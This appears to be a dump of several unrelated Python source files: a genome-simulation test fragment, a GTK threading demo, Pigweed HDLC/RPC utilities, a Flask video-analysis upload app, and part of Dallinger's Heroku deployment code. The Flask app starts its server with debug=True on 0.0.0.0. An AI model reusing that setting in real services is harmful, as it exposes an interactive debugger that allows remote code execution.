range(len(self.gen._mutation_list)): mutation = self.gen._mutation_list[i] self.assertTrue(ref_genome[last_end:mutation[0]] in donor_genome) last_end = mutation[1] mut_type = mutation[2] range_stt = max(0, mutation[0]-20) range_end = min(len(ref_genome)-1, mutation[0]+20) gapped_range_end = min(len(ref_genome)-1, mutation[1]+20) if mut_type == 'SNP': self.assertTrue(ref_genome[range_stt:range_end] not in donor_genome, msg='SNP ' + str(mutation[0])) elif mut_type == 'MUT_STR': new_str = mutation[3] self.assertTrue(new_str in donor_genome, msg='MUT_STR ' + str(mutation[0])) elif mut_type == 'DONOR_STR': str_seq = mutation[3] nbr_copies = mutation[4] new_str = str_seq * nbr_copies 
self.assertTrue(new_str in donor_genome, msg='DONOR_STR ' + str(mutation[0])) elif mut_type == 'REF_ALU': self.assertTrue(ref_genome[mutation[0]:mutation[1]] in donor_genome, msg='REF_ALU ' + str(mutation[0])) elif mut_type == 'REF_CNV': self.assertTrue(ref_genome[mutation[0]:mutation[1]] in donor_genome, msg='REF_CNV ' + str(mutation[0])) elif mut_type == 'DONOR_ALU': self.assertTrue(ref_genome[range_stt:gapped_range_end] not in donor_genome, msg='DONOR_ALU ' + str(mutation[0])) elif mut_type == 'INV': inv_seq = ref_genome[mutation[0]:mutation[1]] inv_seq = inv_seq[::-1] self.assertTrue(inv_seq in donor_genome, msg='INV ' + str(mutation[0])) elif mut_type == 'INS': self.assertTrue(ref_genome[range_stt:range_end] not in donor_genome, msg='INS ' + str(mutation[0])) elif mut_type == 'DEL': self.assertTrue(ref_genome[range_stt:gapped_range_end] not in donor_genome, msg='DEL ' + str(mutation[0])) if __name__ == '__main__': unittest.main() test_results = [] for alu in ['y', 'n']: for test in [[100, 'k'], [200, 'k'], [300, 'k'], [400, 'k']]:#, [500, 'k'], [600, 'k'], [700, 'k'], [800, 'k'], [900, 'k'], [1, 'm']]: args = TestSetting() args.id = 'test' args.num_chr = 1 args.chr_size = test[0] args.scale = test[1] args.alu = alu args.assembly = 'n' start = time.clock() gen = genome_gen(args) print('generating ref genome') gen.generate_ref_genome() print('generating donor genome') gen.generate_donor_genome() print('generating reads') gen.generate_reads() test_results.append('Test: ' + str(test[0]) + test[1] + ' time: ' + str(time.clock() - start)) for res in test_results: print(res)
threadtest1.py
import threading
import time

import gi

gi.require_version("Gtk", "3.0")
from gi.repository import GLib, Gtk, GObject


def app_main():
    """Build a window with a progress bar and pulse it from a worker thread."""
    win = Gtk.Window(default_height=50, default_width=300)
    win.connect("destroy", Gtk.main_quit)

    progress = Gtk.ProgressBar(show_text=True)
    win.add(progress)

    def update_progress(i):
        # Runs on the GTK main loop via GLib.idle_add below; GTK widgets must
        # only be touched from the main thread.
        progress.pulse()
        progress.set_text(str(i))
        return False  # one-shot: do not re-schedule this idle callback

    def example_target():
        # Worker: schedule 50 UI updates, one every 0.2 s.
        for i in range(50):
            GLib.idle_add(update_progress, i)
            time.sleep(0.2)

    win.show_all()

    # BUG FIX: the original passed target=example_target() -- which *called*
    # the function immediately on the main thread (blocking the UI for ~10 s)
    # and handed Thread a useless None target. Pass the callable itself so
    # the loop actually runs on the background thread.
    thread = threading.Thread(target=example_target)
    thread.daemon = True
    thread.start()


if __name__ == '__main__':
    app_main()
    Gtk.main()
rpc.py
# Copyright 2020 The Pigweed Authors
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may not
# use this file except in compliance with the License. You may obtain a copy of
# the License at
#
#     https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations under
# the License.
"""Utilities for using HDLC with pw_rpc."""

from concurrent.futures import ThreadPoolExecutor
import io
import logging
from queue import SimpleQueue
import sys
import threading
import time
import socket
import subprocess
from typing import (Any, BinaryIO, Callable, Dict, Iterable, List, NoReturn,
                    Optional, Sequence, Union)

from pw_protobuf_compiler import python_protos
import pw_rpc
from pw_rpc import callback_client

from pw_hdlc.decode import Frame, FrameDecoder
from pw_hdlc import encode

_LOG = logging.getLogger(__name__)

# HDLC addresses used to demultiplex the byte stream: frames addressed to
# STDOUT_ADDRESS carry the device's plain-text output, frames addressed to
# DEFAULT_ADDRESS ('R') carry pw_rpc packets.
STDOUT_ADDRESS = 1
DEFAULT_ADDRESS = ord('R')


def channel_output(writer: Callable[[bytes], Any],
                   address: int = DEFAULT_ADDRESS,
                   delay_s: float = 0) -> Callable[[bytes], None]:
    """Returns a function that can be used as a channel output for pw_rpc.

    Args:
      writer: called with the HDLC-encoded bytes to transmit.
      address: HDLC address to encode outgoing frames with.
      delay_s: if nonzero, sleep this long before *each byte* is written
        (works around unbuffered serial links that drop back-to-back bytes).
    """
    if delay_s:

        def slow_write(data: bytes) -> None:
            """Slows down writes in case unbuffered serial is in use."""
            for byte in data:
                time.sleep(delay_s)
                writer(bytes([byte]))

        return lambda data: slow_write(encode.ui_frame(address, data))

    def write_hdlc(data: bytes):
        # Fast path: encode the whole frame and hand it to the writer at once.
        frame = encode.ui_frame(address, data)
        _LOG.debug('Write %2d B: %s', len(frame), frame)
        writer(frame)

    return write_hdlc


def _handle_error(frame: Frame) -> None:
    # Default handler for frames that failed CRC/decoding.
    _LOG.error('Failed to parse frame: %s', frame.status.value)
    _LOG.debug('%s', frame.data)


# Maps an HDLC address to the callback invoked for frames at that address.
FrameHandlers = Dict[int, Callable[[Frame], Any]]


def read_and_process_data(read: Callable[[], bytes],
                          on_read_error: Callable[[Exception], Any],
                          frame_handlers: FrameHandlers,
                          error_handler: Callable[[Frame],
                                                  Any] = _handle_error,
                          handler_threads: Optional[int] = 1) -> NoReturn:
    """Continuously reads and handles HDLC frames.

    Passes frames to an executor that calls frame handler functions in other
    threads.

    Args:
      read: blocking function returning the next chunk of raw bytes.
      on_read_error: called with the exception whenever read() raises;
        reading then continues.
      frame_handlers: per-address callbacks for successfully decoded frames.
      error_handler: callback for frames that failed to decode.
      handler_threads: worker count for the handler executor.
    """
    def handle_frame(frame: Frame):
        try:
            if not frame.ok():
                error_handler(frame)
                return

            try:
                frame_handlers[frame.address](frame)
            except KeyError:
                _LOG.warning('Unhandled frame for address %d: %s',
                             frame.address, frame)
        except:  # pylint: disable=bare-except
            # Never let a handler exception kill the executor worker.
            _LOG.exception('Exception in HDLC frame handler thread')

    decoder = FrameDecoder()

    # Execute callbacks in a ThreadPoolExecutor to decouple reading the input
    # stream from handling the data. That way, if a handler function takes a
    # long time or crashes, this reading thread is not interrupted.
    with ThreadPoolExecutor(max_workers=handler_threads) as executor:
        while True:
            try:
                data = read()
            except Exception as exc:  # pylint: disable=broad-except
                on_read_error(exc)
                continue

            if data:
                _LOG.debug('Read %2d B: %s', len(data), data)

                for frame in decoder.process_valid_frames(data):
                    executor.submit(handle_frame, frame)


def write_to_file(data: bytes, output: BinaryIO = sys.stdout.buffer):
    # Default "device stdout" sink: newline-terminate and flush immediately
    # so interleaved device output appears promptly.
    output.write(data + b'\n')
    output.flush()


def default_channels(write: Callable[[bytes], Any]) -> List[pw_rpc.Channel]:
    # One RPC channel (ID 1) whose output is HDLC-encoded through `write`.
    return [pw_rpc.Channel(1, channel_output(write))]


# Proto sources may be given as paths/modules or as an already-built Library.
PathsModulesOrProtoLibrary = Union[Iterable[python_protos.PathOrModule],
                                   python_protos.Library]


class HdlcRpcClient:
    """An RPC client configured to run over HDLC."""
    def __init__(self,
                 read: Callable[[], bytes],
                 paths_or_modules: PathsModulesOrProtoLibrary,
                 channels: Iterable[pw_rpc.Channel],
                 output: Callable[[bytes], Any] = write_to_file,
                 client_impl: pw_rpc.client.ClientImpl = None):
        """Creates an RPC client configured to communicate using HDLC.

        Args:
          read: Function that reads bytes; e.g serial_device.read.
          paths_or_modules: paths to .proto files or proto modules
          channels: RPC channels to use for output
          output: where to write "stdout" output from the device
          client_impl: RPC client implementation; defaults to the
            callback-based implementation.
        """
        if isinstance(paths_or_modules, python_protos.Library):
            self.protos = paths_or_modules
        else:
            self.protos = python_protos.Library.from_paths(paths_or_modules)

        if client_impl is None:
            client_impl = callback_client.Impl()

        self.client = pw_rpc.Client.from_modules(client_impl, channels,
                                                 self.protos.modules())

        # Route RPC frames to the client and stdout frames to `output`.
        frame_handlers: FrameHandlers = {
            DEFAULT_ADDRESS: self._handle_rpc_packet,
            STDOUT_ADDRESS: lambda frame: output(frame.data),
        }

        # Start background thread that reads and processes RPC packets.
        # Read errors are deliberately ignored (lambda exc: None).
        threading.Thread(target=read_and_process_data,
                         daemon=True,
                         args=(read, lambda exc: None,
                               frame_handlers)).start()

    def rpcs(self, channel_id: int = None) -> Any:
        """Returns object for accessing services on the specified channel.

        This skips some intermediate layers to make it simpler to invoke RPCs
        from an HdlcRpcClient. If only one channel is in use, the channel ID is
        not necessary.
        """
        if channel_id is None:
            return next(iter(self.client.channels())).rpcs

        return self.client.channel(channel_id).rpcs

    def _handle_rpc_packet(self, frame: Frame) -> None:
        # Feed the payload of an RPC-addressed frame to the pw_rpc client.
        if not self.client.process_packet(frame.data):
            _LOG.error('Packet not handled by RPC client: %s', frame.data)


def _try_connect(sock: socket.socket, port: int, attempts: int = 10) -> None:
    """Tries to connect to the specified port up to the given number of times.

    This is helpful when connecting to a process that was started by this
    script. The process may need time to start listening for connections, and
    that length of time can vary. This retries with a short delay rather than
    having to wait for the worst case delay every time.
    """
    while True:
        attempts -= 1
        time.sleep(0.001)
        try:
            sock.connect(('localhost', port))
            return
        except ConnectionRefusedError:
            # Re-raise only once the retry budget is exhausted.
            if attempts <= 0:
                raise


class SocketSubprocess:
    """Executes a subprocess and connects to it with a socket."""
    def __init__(self, command: Sequence, port: int) -> None:
        # The child's stdin is piped so callers can feed it via self.stdin.
        self._server_process = subprocess.Popen(command, stdin=subprocess.PIPE)
        self.stdin = self._server_process.stdin

        sock = None
        try:
            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            _try_connect(sock, port)  # 🧦
        except:
            # Clean up the socket and the child process on any failure,
            # then re-raise (bare except is intentional: even
            # KeyboardInterrupt must not leak the subprocess).
            if sock:
                sock.close()

            self._server_process.terminate()
            self._server_process.communicate()
            raise

        self.socket: socket.socket = sock

    def close(self) -> None:
        # Close the socket first, but terminate the child even if that fails.
        try:
            self.socket.close()
        finally:
            self._server_process.terminate()
            self._server_process.communicate()

    def __enter__(self) -> 'SocketSubprocess':
        return self

    def __exit__(self, exc_type, exc_value, traceback) -> None:
        self.close()


class HdlcRpcLocalServerAndClient:
    """Runs an RPC server in a subprocess and connects to it over a socket.

    This can be used to run a local RPC server in an integration test.
    """
    def __init__(self, server_command: Sequence, port: int,
                 protos: PathsModulesOrProtoLibrary) -> None:
        self.server = SocketSubprocess(server_command, port)

        # Bytes received from the socket are queued; the HdlcRpcClient's
        # reader thread consumes them via _bytes_queue.get.
        self._bytes_queue: 'SimpleQueue[bytes]' = SimpleQueue()
        self._read_thread = threading.Thread(target=self._read_from_socket)
        self._read_thread.start()

        self.output = io.BytesIO()

        self.client = HdlcRpcClient(
            self._bytes_queue.get, protos,
            default_channels(self.server.socket.sendall),
            self.output.write).client

    def _read_from_socket(self):
        while True:
            data = self.server.socket.recv(4096)
            self._bytes_queue.put(data)
            # recv() returning b'' means the peer closed the connection;
            # the empty chunk is still queued so the consumer sees EOF.
            if not data:
                return

    def close(self):
        # NOTE(review): closing the socket makes the reader thread's recv()
        # fail/return, which is what lets join() complete -- confirm if the
        # shutdown order here is ever changed.
        self.server.close()
        self.output.close()
        self._read_thread.join()

    def __enter__(self) -> 'HdlcRpcLocalServerAndClient':
        return self

    def __exit__(self, exc_type, exc_value, traceback) -> None:
        self.close()
apptest.py
import os
from flask import Flask, render_template, request, redirect, url_for
from run_edi import talking_time_count,gender_time_count
from run_edi import main
import time
import threading
import subprocess
# from yolov5.detect import get_opt, obj_detect #added for detect convert

app = Flask(__name__)

# Module-level state shared between the request handlers and the worker
# thread. NOTE(review): plain globals are not synchronized; this only works
# because a single analysis runs at a time (gated by `begin`) -- confirm
# before running with multiple workers.
begin = 0                                # 1 while an analysis is in progress
stop = 0                                 # 1 once the analysis has finished
print_result = 'this will take a while'  # text rendered on result.html
file_path = ''                           # path of the last uploaded video


@app.route('/')
def index():
    """Serve the upload form."""
    return render_template('index.html')


@app.route('/', methods=['POST','GET'])
def upload_file():
    """Accept an uploaded video and start the analysis worker thread.

    If an analysis is already running (begin == 1), the upload is ignored
    and the current progress page is rendered instead.
    """
    global begin
    global print_result
    global gender_result
    global file_path
    global stop
    if begin == 0:
        stop = 0 #first
        print_result = 'this will take a while'
        uploaded_file = request.files['file']
        basepath = os.path.dirname(__file__)
        if uploaded_file.filename != '':
            # SECURITY FIX: basename() strips any client-supplied directory
            # components so the upload cannot escape the data/ directory
            # (path traversal).
            file_path = os.path.join(
                basepath, 'data', os.path.basename(uploaded_file.filename))
            uploaded_file.save(file_path)
        begin = 1
        t1 = threading.Thread(target=test1)
        t1.start()
    return render_template('result.html',name = print_result, stop=stop)


def test1():
    """Worker thread: run the analysis script and collect its results."""
    global begin
    if begin == 1:
        global file_path
        global print_result
        global gender_result
        global stop
        # SECURITY FIX: the original built a shell string with os.system()
        # from the untrusted uploaded filename, allowing command injection.
        # Run the analyzer with an argument list and no shell instead.
        subprocess.run(['python', 'run_edi.py', '--video', file_path])
        print_result = talking_time_count(file_path)
        gender_result = gender_time_count(file_path)
        print_result = print_result + gender_result
        print(print_result)
        # Reset the progress file for the next run; `with` guarantees the
        # handle is closed even if the write fails.
        with open("percent.txt", mode="w") as percent_file:
            percent_file.write('0%')
        print('analysis finished, printing on html')
        stop = 1
        begin = 0


@app.route('/result', methods=['POST','GET'])
def result():
    """Render the progress (while running) or the final result."""
    global print_result
    global gender_result
    global stop
    if stop == 0:
        # While the analysis runs, run_edi.py writes its progress into
        # percent.txt; show that instead of the final result.
        with open("percent.txt", mode="r") as percent_file:
            print_result = percent_file.read()
    return render_template('result.html',name= print_result, stop=stop)


if __name__ == '__main__':
    app.run(port=9999,debug=True,host='0.0.0.0' )
deployment.py
# -*- coding: utf-8 -*- from __future__ import unicode_literals import codecs import json import os import pkg_resources import re import redis import requests import shutil import six import tempfile import threading import time from six.moves import shlex_quote as quote from six.moves.urllib.parse import urlparse from six.moves.urllib.parse import urlunparse from unicodedata import normalize from dallinger import data from dallinger import db from dallinger import heroku from dallinger import recruiters from dallinger import registration from dallinger.config import get_config from dallinger.heroku.tools import HerokuApp from dallinger.heroku.tools import HerokuLocalWrapper from dallinger.utils import connect_to_redis from dallinger.utils import dallinger_package_path from dallinger.utils import ensure_directory from dallinger.utils import get_base_url from dallinger.utils import open_browser from dallinger.utils import GitClient from faker import Faker fake = Faker() def exclusion_policy(): """Returns a callable which, when passed a directory path and a list of files in that directory, will return a subset of the files which should be excluded from a copy or some other action. See https://docs.python.org/3/library/shutil.html#shutil.ignore_patterns """ patterns = set( [ ".git", "config.txt", "*.db", "*.dmg", "node_modules", "snapshots", "data", "server.log", "__pycache__", ] ) return shutil.ignore_patterns(*patterns) class ExperimentFileSource(object): """Treat an experiment directory as a potential source of files for copying to a temp directory as part of a deployment (debug or otherwise). """ def __init__(self, root_dir="."): self.root = root_dir self.git = GitClient() @property def files(self): """A Set of all files copyable in the source directory, accounting for exclusions. """ return {path for path in self._walk()} @property def size(self): """Combined size of all files, accounting for exclusions. 
""" return sum([os.path.getsize(path) for path in self._walk()]) def selective_copy_to(self, destination): """Write files from the source directory to another directory, skipping files excluded by the general exclusion_policy, plus any files ignored by git configuration. """ for path in self.files: subpath = os.path.relpath(path, start=self.root) target_folder = os.path.join(destination, os.path.dirname(subpath)) ensure_directory(target_folder) shutil.copy2(path, target_folder) def _walk(self): # The GitClient and os.walk may return different representations of the # same unicode characters, so we use unicodedata.normalize() for # comparisons: # list(name_from_git) # ['å', ' ', 'f', 'i', 'l', 'e', '.', 't', 'x', 't'] # list(from_os_walk) # ['a', '̊', ' ', 'f', 'i', 'l', 'e', '.', 't', 'x', 't'] exclusions = exclusion_policy() git_files = { os.path.join(self.root, normalize("NFC", f)) for f in self.git.files() } for dirpath, dirnames, filenames in os.walk(self.root, topdown=True): current_exclusions = exclusions(dirpath, os.listdir(dirpath)) # Modifying dirnames in-place will prune the subsequent files and # directories visited by os.walk. This is only possible when # topdown = True dirnames[:] = [d for d in dirnames if d not in current_exclusions] legit_files = { os.path.join(dirpath, f) for f in filenames if f not in current_exclusions } if git_files: normalized = { normalize("NFC", six.text_type(f)): f for f in legit_files } legit_files = {v for k, v in normalized.items() if k in git_files} for legit in legit_files: yield legit class ExplicitFileSource(object): """Add files that are explicitly requested by the experimenter with a hook function. 
""" def __init__(self, root_dir="."): self.root = root_dir def _get_mapping(self, dst): from dallinger.config import initialize_experiment_package initialize_experiment_package(dst) from dallinger.experiment import load exp_class = load() extra_files = getattr(exp_class, "extra_files", None) if extra_files is None: try: from dallinger_experiment.experiment import extra_files except ImportError: try: from dallinger_experiment.dallinger_experiment import extra_files except ImportError: pass if extra_files is not None: for src, filename in extra_files(): filename = filename.lstrip("/") if os.path.isdir(src): for dirpath, dirnames, filenames in os.walk(src, topdown=True): for fn in filenames: dst_fileparts = [dst, filename] + dirnames + [fn] dst_filepath = os.path.join(*dst_fileparts) yield ( os.path.join(dirpath, fn), dst_filepath, ) else: dst_filepath = os.path.join(dst, filename) yield (src, dst_filepath) @property def files(self): """A Set of all files copyable in the source directory, accounting for exclusions. """ return {src for (src, dst) in self._get_mapping("")} @property def size(self): """Combined size of all files, accounting for exclusions. """ return sum([os.path.getsize(path) for path in self.files]) def selective_copy_to(self, destination): """Write files from the source directory to another directory, skipping files excluded by the general exclusion_policy, plus any files ignored by git configuration. """ for from_path, to_path in self._get_mapping(destination): target_folder = os.path.dirname(to_path) ensure_directory(target_folder) shutil.copyfile(from_path, to_path) def assemble_experiment_temp_dir(config): """Create a temp directory from which to run an experiment. 
The new directory will include: - Copies of custom experiment files which don't match the exclusion policy - Templates and static resources from Dallinger - An export of the loaded configuration - Heroku-specific files (Procile, runtime.txt) from Dallinger Assumes the experiment root directory is the current working directory. Returns the absolute path of the new directory. """ exp_id = config.get("id") dst = os.path.join(tempfile.mkdtemp(), exp_id) # Copy local experiment files, minus some ExperimentFileSource(os.getcwd()).selective_copy_to(dst) # Export the loaded configuration config.write(filter_sensitive=True, directory=dst) # Save the experiment id with open(os.path.join(dst, "experiment_id.txt"), "w") as file: file.write(exp_id) # Copy Dallinger files dallinger_root = dallinger_package_path() ensure_directory(os.path.join(dst, "static", "scripts")) ensure_directory(os.path.join(dst, "static", "css")) frontend_files = [ os.path.join("static", "css", "bootstrap.min.css"), os.path.join("static", "css", "dallinger.css"), os.path.join("static", "css", "dashboard.css"), os.path.join("static", "scripts", "jquery-3.5.1.min.js"), os.path.join("static", "scripts", "popper.min.js"), os.path.join("static", "scripts", "bootstrap.min.js"), os.path.join("static", "scripts", "clipboard.min.js"), os.path.join("static", "scripts", "dallinger2.js"), os.path.join("static", "scripts", "network-monitor.js"), os.path.join("static", "scripts", "reqwest.min.js"), os.path.join("static", "scripts", "require.js"), os.path.join("static", "scripts", "reconnecting-websocket.js"), os.path.join("static", "scripts", "spin.min.js"), os.path.join("static", "scripts", "tracker.js"), os.path.join("static", "scripts", "store+json2.min.js"), os.path.join("templates", "error.html"), os.path.join("templates", "error-complete.html"), os.path.join("templates", "launch.html"), os.path.join("templates", "complete.html"), os.path.join("templates", "questionnaire.html"), os.path.join("templates", 
"thanks.html"), os.path.join("templates", "waiting.html"), os.path.join("templates", "login.html"), os.path.join("templates", "dashboard_lifecycle.html"), os.path.join("templates", "dashboard_database.html"), os.path.join("templates", "dashboard_heroku.html"), os.path.join("templates", "dashboard_home.html"), os.path.join("templates", "dashboard_monitor.html"), os.path.join("templates", "dashboard_mturk.html"), os.path.join("static", "robots.txt"), ] frontend_dirs = [os.path.join("templates", "base")] for filename in frontend_files: src = os.path.join(dallinger_root, "frontend", filename) dst_filepath = os.path.join(dst, filename) if not os.path.exists(dst_filepath): shutil.copy(src, dst_filepath) for filename in frontend_dirs: src = os.path.join(dallinger_root, "frontend", filename) dst_filepath = os.path.join(dst, filename) if not os.path.exists(dst_filepath): shutil.copytree(src, dst_filepath) # Copy Heroku files heroku_files = ["Procfile"] for filename in heroku_files: src = os.path.join(dallinger_root, "heroku", filename) shutil.copy(src, os.path.join(dst, filename)) # Write out a runtime.txt file based on configuration pyversion = config.get("heroku_python_version") with open(os.path.join(dst, "runtime.txt"), "w") as file: file.write("python-{}".format(pyversion)) if not config.get("clock_on"): # If the clock process has been disabled, overwrite the Procfile: src = os.path.join(dallinger_root, "heroku", "Procfile_no_clock") shutil.copy(src, os.path.join(dst, "Procfile")) ExplicitFileSource(os.getcwd()).selective_copy_to(dst) return dst def setup_experiment(log, debug=True, verbose=False, app=None, exp_config=None): """Checks the experiment's python dependencies, then prepares a temp directory with files merged from the custom experiment and Dallinger. The resulting directory includes all the files necessary to deploy to Heroku. """ # Verify that the Postgres server is running. 
try: db.check_connection() except Exception: log("There was a problem connecting to the Postgres database!") raise # Check that the demo-specific requirements are satisfied. try: with open("requirements.txt", "r") as f: dependencies = [r for r in f.readlines() if r[:3] != "-e "] except (OSError, IOError): dependencies = [] pkg_resources.require(dependencies) # Generate a unique id for this experiment. from dallinger.experiment import Experiment experiment_uid = heroku_app_id = Experiment.make_uuid(app) log("Experiment UID: {}".format(experiment_uid)) # Load and update the config config = get_config() if not config.ready: config.load() # if exp_config: config.extend(exp_config) # If the user provided an app name, store it. We'll use it as the basis for # the Heroku app ID. We still have a fair amount of ambiguity around what # this value actually represents (it's not used as _only_ the Heroku app ID). if app: heroku_app_id = str(app) log("Using custom Heroku ID root: {}".format(heroku_app_id)) config.extend( { "id": six.text_type(experiment_uid), "heroku_app_id_root": six.text_type(heroku_app_id), } ) if not config.get("dashboard_password", None): config.set("dashboard_password", fake.password(length=20, special_chars=False)) temp_dir = assemble_experiment_temp_dir(config) log("Deployment temp directory: {}".format(temp_dir), chevrons=False) # Zip up the temporary directory and place it in the cwd. 
if not debug: log("Freezing the experiment package...") shutil.make_archive( os.path.join(os.getcwd(), "snapshots", heroku_app_id + "-code"), "zip", temp_dir, ) return (heroku_app_id, temp_dir) INITIAL_DELAY = 1 BACKOFF_FACTOR = 2 MAX_ATTEMPTS = 6 def _handle_launch_data(url, error, delay=INITIAL_DELAY, attempts=MAX_ATTEMPTS): for remaining_attempt in sorted(range(attempts), reverse=True): # [3, 2, 1, 0] time.sleep(delay) launch_request = requests.post(url) try: launch_data = launch_request.json() except ValueError: error( "Error parsing response from {}, " "check web dyno logs for details: {}".format(url, launch_request.text) ) raise # Early return if successful if launch_request.ok: return launch_data error( "Error accessing {} ({}):\n{}".format( url, launch_request.status_code, launch_request.text ) ) if remaining_attempt: delay = delay * BACKOFF_FACTOR next_attempt_count = attempts - (remaining_attempt - 1) error( "Experiment launch failed. Trying again " "(attempt {} of {}) in {} seconds ...".format( next_attempt_count, attempts, delay ) ) error("Experiment launch failed, check web dyno logs for details.") if launch_data.get("message"): error(launch_data["message"]) launch_request.raise_for_status() def deploy_sandbox_shared_setup( log, verbose=True, app=None, exp_config=None, prelaunch_actions=None ): """Set up Git, push to Heroku, and launch the app.""" if verbose: out = None else: out = open(os.devnull, "w") config = get_config() if not config.ready: config.load() heroku.sanity_check(config) (heroku_app_id, tmp) = setup_experiment( log, debug=False, app=app, exp_config=exp_config ) # Register the experiment using all configured registration services. if config.get("mode") == "live": log("Registering the experiment on configured services...") registration.register(heroku_app_id, snapshot=None) # Log in to Heroku if we aren't already. 
log("Making sure that you are logged in to Heroku.") heroku.log_in() config.set("heroku_auth_token", heroku.auth_token()) log("", chevrons=False) # Change to temporary directory. cwd = os.getcwd() os.chdir(tmp) # Commit Heroku-specific files to tmp folder's git repo. git = GitClient(output=out) git.init() git.add("--all") git.commit('"Experiment {}"'.format(heroku_app_id)) # Initialize the app on Heroku. log("Initializing app on Heroku...") team = config.get("heroku_team", None) heroku_app = HerokuApp(dallinger_uid=heroku_app_id, output=out, team=team) heroku_app.bootstrap() heroku_app.buildpack("https://github.com/stomita/heroku-buildpack-phantomjs") heroku_app.set("PYTHON_NO_SQLITE3", "true") # Set up add-ons and AWS environment variables. database_size = config.get("database_size") redis_size = config.get("redis_size") addons = [ "heroku-postgresql:{}".format(quote(database_size)), "heroku-redis:{}".format(quote(redis_size)), "papertrail", ] if config.get("sentry"): addons.append("sentry") for name in addons: heroku_app.addon(name) heroku_config = { "aws_access_key_id": config["aws_access_key_id"], "aws_secret_access_key": config["aws_secret_access_key"], "aws_region": config["aws_region"], "auto_recruit": config["auto_recruit"], "smtp_username": config["smtp_username"], "smtp_password": config["smtp_password"], "whimsical": config["whimsical"], "FLASK_SECRET_KEY": codecs.encode(os.urandom(16), "hex").decode("ascii"), } # Set up the preferred class as an environment variable, if one is set # This is needed before the config is parsed, but we also store it in the # config to make things easier for recording into bundles. preferred_class = config.get("EXPERIMENT_CLASS_NAME", None) if preferred_class: heroku_config["EXPERIMENT_CLASS_NAME"] = preferred_class heroku_app.set_multiple(**heroku_config) # Wait for Redis database to be ready. 
log("Waiting for Redis...", nl=False) ready = False while not ready: try: r = connect_to_redis(url=heroku_app.redis_url) r.set("foo", "bar") ready = True log("\n✓ connected at {}".format(heroku_app.redis_url), chevrons=False) except (ValueError, redis.exceptions.ConnectionError): time.sleep(2) log(".", chevrons=False, nl=False) log("Saving the URL of the postgres database...") config.extend({"database_url": heroku_app.db_url}) config.write() git.add("config.txt") git.commit("Save URL for database") log("Generating dashboard links...") heroku_addons = heroku_app.addon_parameters() heroku_addons = json.dumps(heroku_addons) if six.PY2: heroku_addons = heroku_addons.decode("utf-8") config.extend({"infrastructure_debug_details": heroku_addons}) config.write() git.add("config.txt") git.commit("Save URLs for heroku addon management") # Launch the Heroku app. log("Pushing code to Heroku...") git.push(remote="heroku", branch="HEAD:master") log("Scaling up the dynos...") default_size = config.get("dyno_type") for process in ["web", "worker"]: size = config.get("dyno_type_" + process, default_size) qty = config.get("num_dynos_" + process) heroku_app.scale_up_dyno(process, qty, size) if config.get("clock_on"): heroku_app.scale_up_dyno("clock", 1, size) if prelaunch_actions is not None: for task in prelaunch_actions: task(heroku_app, config) # Launch the experiment. 
log("Launching the experiment on the remote server and starting recruitment...") launch_url = "{}/launch".format(heroku_app.url) log("Calling {}".format(launch_url), chevrons=False) launch_data = _handle_launch_data(launch_url, error=log) result = { "app_name": heroku_app.name, "app_home": heroku_app.url, "dashboard_url": "{}/dashboard/".format(heroku_app.url), "recruitment_msg": launch_data.get("recruitment_msg", None), } log("Experiment details:") log("App home: {}".format(result["app_home"]), chevrons=False) log("Dashboard URL: {}".format(result["dashboard_url"]), chevrons=False) log("Dashboard user: {}".format(config.get("dashboard_user")), chevrons=False) log( "Dashboard password: {}".format(config.get("dashboard_password")), chevrons=False, ) log("Recruiter info:") log(result["recruitment_msg"], chevrons=False) # Return to the branch whence we came. os.chdir(cwd) log( "Completed Heroku deployment of experiment ID {} using app ID {}.".format( config.get("id"), heroku_app_id ) ) return result class HerokuLocalDeployment(object): exp_id = None tmp_dir = None dispatch = {} # Subclass may provide handlers for Heroku process output environ = None def configure(self): self.exp_config.update({"mode": "debug", "loglevel": 0}) def setup(self): self.exp_id, self.tmp_dir = setup_experiment( self.out.log, exp_config=self.exp_config ) def update_dir(self): os.chdir(self.tmp_dir) # Update the logfile to the new directory config = get_config() logfile = config.get("logfile") if logfile and logfile != "-": logfile = os.path.join(self.original_dir, logfile) config.extend({"logfile": logfile}) config.write() def run(self): """Set up the environment, get a HerokuLocalWrapper instance, and pass it to the concrete class's execute() method. 
""" self.configure() self.setup() self.update_dir() db.init_db(drop_all=True) config = get_config() environ = None if self.environ: environ = os.environ.copy() environ.update(self.environ) self.out.log("Starting up the Heroku Local server...") with HerokuLocalWrapper( config, self.out, verbose=self.verbose, env=environ ) as wrapper: try: self.execute(wrapper) except KeyboardInterrupt: pass finally: os.chdir(self.original_dir) self.cleanup() def notify(self, message): """Callback function which checks lines of output, tries to match against regex defined in subclass's "dispatch" dict, and passes through to a handler on match. """ for regex, handler in self.dispatch.items(): match = re.search(regex, message) if match: handler = getattr(self, handler) return handler(match) def execute(self, heroku): raise NotImplementedError() class DebugDeployment(HerokuLocalDeployment): dispatch = { r"[^\"]{} (.*)$".format(recruiters.NEW_RECRUIT_LOG_PREFIX): "new_recruit", r"{}".format(recruiters.CLOSE_RECRUITMENT_LOG_PREFIX): "recruitment_closed", } def __init__(self, output, verbose, bot, proxy_port, exp_config, no_browsers=False): self.out = output self.verbose = verbose self.bot = bot self.exp_config = exp_config or {} self.proxy_port = proxy_port self.original_dir = os.getcwd() self.complete = False self.status_thread = None self.no_browsers = no_browsers self.environ = { "FLASK_SECRET_KEY": codecs.encode(os.urandom(16), "hex").decode("ascii"), } def configure(self): super(DebugDeployment, self).configure() if self.bot: self.exp_config["recruiter"] = "bots" def execute(self, heroku): base_url = get_base_url() self.out.log("Server is running on {}. 
